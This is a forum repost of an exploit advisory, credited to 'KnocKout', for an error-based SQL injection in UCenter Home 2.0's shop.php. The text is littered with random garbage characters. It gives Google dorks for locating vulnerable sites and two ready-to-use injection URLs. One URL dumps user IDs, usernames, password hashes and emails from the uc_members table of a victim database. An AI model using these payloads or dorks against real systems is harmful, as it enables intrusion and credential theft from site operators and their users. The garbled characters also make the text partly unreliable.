* h/ k4 h9 u! z2 e__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 6 @+ g1 E/ b) B S
8 Y# Y4 z% \9 [6 ? v7 c5 c* R e y/ m" h1 g% t( T
) M5 W5 F' W4 M' |8 x*/ Author : KnocKout
) W' C2 ~; ?, C2 R
0 r& \; L/ ^8 ^" w& p/ R*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
6 e8 |% ^5 I0 O5 Z3 ~
# k+ k( q' R2 D( d `. c*/ Contact: knockoutr@msn.com
! a: H$ Y% e+ C2 F/ Z! B
1 ~1 r/ H V% [- r. x*/ Cyber-Warrior.org/CWKnocKout - Z$ S5 [( N$ E6 m
' M+ T5 \9 J( X0 G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % o. P' ]% K' s* \$ c: Y2 ]
- x1 A c% i& U% |8 JScript : UCenter Home
' P+ o' L% [0 J( v: Z7 p& ]) `& d' @- Q
Version : 2.0 " F0 K, g3 Q# V/ @, w$ A
, O& Y( z6 q4 y0 tScript HomePage : http://u.discuz.net/ ! l9 Z. p( O2 w% `) N
" C7 T9 c! o* D3 t. Q/ U3 e; r__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 X# I$ A& _3 L& M, E( B1 ^# I7 W |' T
Dork : Powered by UCenter inurl:shop.php?ac=view # Y( n7 Q3 [7 V/ |- u0 U
. @$ J/ J' E! q& U1 }3 J
Dork 2 : inurl:shop.php?ac=view&shopid= . V) M6 |1 L2 P
2 n$ {; V1 v# _1 W1 ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, B# x4 P5 i# g, m7 ?" ^2 D9 w! L/ N% V4 E
Vuln file : Shop.php
% b7 c# \, T* N6 [
$ o. l0 l1 l' [# n. Kvalue's : (?)ac=view&shopid= . ~, S' g" G3 e8 N! P' Q
0 z: Q2 R9 C6 _" y0 hVulnerable Style : SQL Injection (MySQL Error Based) ( M! R, A8 Q/ ?4 v) A
- c$ [, Y" G, o6 M( X- d
Need Metarials : Hex Conversion
* r- `4 I& @" A! r) G# Z1 ]/ [3 N8 v- a6 r f% j" Z: k W9 `+ ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
i3 m; _1 H5 Z1 _9 j; I( k* s7 k; L( x8 B# K& X% v
Your Need victim Database name.
% v3 m2 n5 U. l! s5 m# s3 h/ l p: S; l- w
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 {( D/ q- G9 Y6 p. T& W. k; {3 J$ g
.. 7 J* \+ w% {6 k; j9 U5 h3 A( _/ f! ~
9 \. a+ ]3 y5 N6 j6 M3 A0 zDB : Okey.
' A. a- w3 `1 a6 l0 m; }$ ^) G7 p8 V# e$ A: m- ^
your edit DB `[TARGET DB NAME]`
' m1 N4 G$ N+ U+ X4 F
n( _4 A# `' g7 EExample : 'hiwir1_ucenter' ) @3 w( x% \8 @2 F3 L Z. \+ ^
* ^, e' Z! B5 ]' J/ J2 X1 h
Edit : Okey. # Z: |4 {7 Q9 p6 e: P
! V$ F3 ^( t" e0 O4 D6 LYour use Hex conversion. And edit Your SQL Injection Exploit.. [, q4 c' w7 [+ ~7 b
! Z9 ^: t2 Z( T
3 t' [; h. j/ E- t# v4 p. B1 k' S) Z R4 k
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 0 c0 Z' J) S- F' G; ^# Z
|
发表于 2013-2-27 21:31:31
收藏
支持
反对